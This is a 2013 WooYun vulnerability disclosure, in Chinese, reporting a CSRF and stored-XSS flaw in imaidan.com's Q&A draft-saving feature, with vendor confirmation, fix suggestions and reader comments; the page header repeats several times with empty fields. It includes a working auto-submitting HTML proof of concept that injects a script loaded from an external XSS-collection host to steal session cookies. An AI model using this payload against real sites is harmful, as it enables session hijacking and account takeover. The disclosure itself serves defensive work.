麦单网一个csrf和xss的综合利用留后门 | wooyun-2013-027409| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027409

漏洞标题：麦单网一个csrf和xss的综合利用留后门

漏洞作者：小胖胖要减肥

提交时间：2013-07-02 11:11

修复时间：2013-08-16 11:12

公开时间：2013-08-16 11:12

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-07-02：细节已通知厂商并且等待厂商处理中
2013-07-02：厂商已经确认，细节仅向厂商公开
2013-07-12：细节向核心白帽子及相关领域专家公开
2013-07-22：细节向普通白帽子公开
2013-08-01：细节向实习白帽子公开
2013-08-16：细节向公众公开

简要描述：

综合来说对xss大部分地方都有过滤，但是有一些自己x自己的地方没有过滤，也没有token，正常回复的地方都加了token

详细说明：

在麦单网信用卡百科网站上，一般回复是不允许带外链的

但是可以预览，正常回复都是有token，无法csrf，但是预览的时候没有token
我们可以构造poc

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<body>
<form id="wrhoooo" name="wrhoooo" action="http://ask.imaidan.com/?/account/ajax/save_draft/item_id-653__type-answer" method="post">
<input type="test" name="message" value='"></textarea><script src=http://xss.tw/989></script>' />
</form>
<script>
document.wrhoooo.submit();
</script>
</body>
</html>

漏洞证明：

然后对热门问题以一个连接的方式回复，当有人点击连接后

http://t.cn/zQvKzdV

这个草稿会永久保存，还是有影响等于是一个后门了，而且个人中心有草稿提示

获得的cookies，有phpsessid能登陆的

修复方案：

1 保存草稿也加一个token
2 回复预览的时候也做一下过滤
草稿虽然不发出来的，但是被人恶意利用了也不好

版权声明：转载请注明来源小胖胖要减肥@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2013-07-02 12:57

厂商回复：

感谢关注,已着手处理！

漏洞评价：

2013-07-02 11:42 | ITLynn ( 路人 | Rank:13 漏洞数:5 | 还有几天就去从军了，野战兵!)

mark!!
2013-07-02 11:53 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

@ITLynn 没到首页你怎么看到的
2013-07-02 13:08 | ITLynn ( 路人 | Rank:13 漏洞数:5 | 还有几天就去从军了，野战兵!)

@小胖胖要减肥你关注的白帽子小胖胖要减肥发表了漏洞麦单网一个csrf和xss的综合利用留后门
2013-07-02 13:14 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

@ITLynn 哈哈这个思路不错的通过大多数地方有过滤忽视小地方
2013-07-02 16:23 | ITLynn ( 路人 | Rank:13 漏洞数:5 | 还有几天就去从军了，野战兵!)

@小胖胖要减肥 ~~能不能把过程私信下学习
2013-07-02 16:29 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

@ITLynn 主要地方都有过滤，小地方么有，但只能自己x自己，利用csrf就能利用到了，具体等公开吧，这个思路很早就有人用的
2013-07-02 18:55 | ITLynn ( 路人 | Rank:13 漏洞数:5 | 还有几天就去从军了，野战兵!)

@小胖胖要减肥你还有爱丽网的存货么？

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027409

漏洞标题：麦单网一个csrf和xss的综合利用留后门

相关厂商：imaidan.com

漏洞作者：小胖胖要减肥

提交时间：2013-07-02 11:11

修复时间：2013-08-16 11:12

公开时间：2013-08-16 11:12

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小胖胖要减肥@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027409

漏洞标题：麦单网一个csrf和xss的综合利用留后门

相关厂商：imaidan.com

漏洞作者： 小胖胖要减肥

提交时间：2013-07-02 11:11

修复时间：2013-08-16 11:12

公开时间：2013-08-16 11:12

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-027409"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小胖胖要减肥@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小胖胖要减肥

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小胖胖要减肥@乌云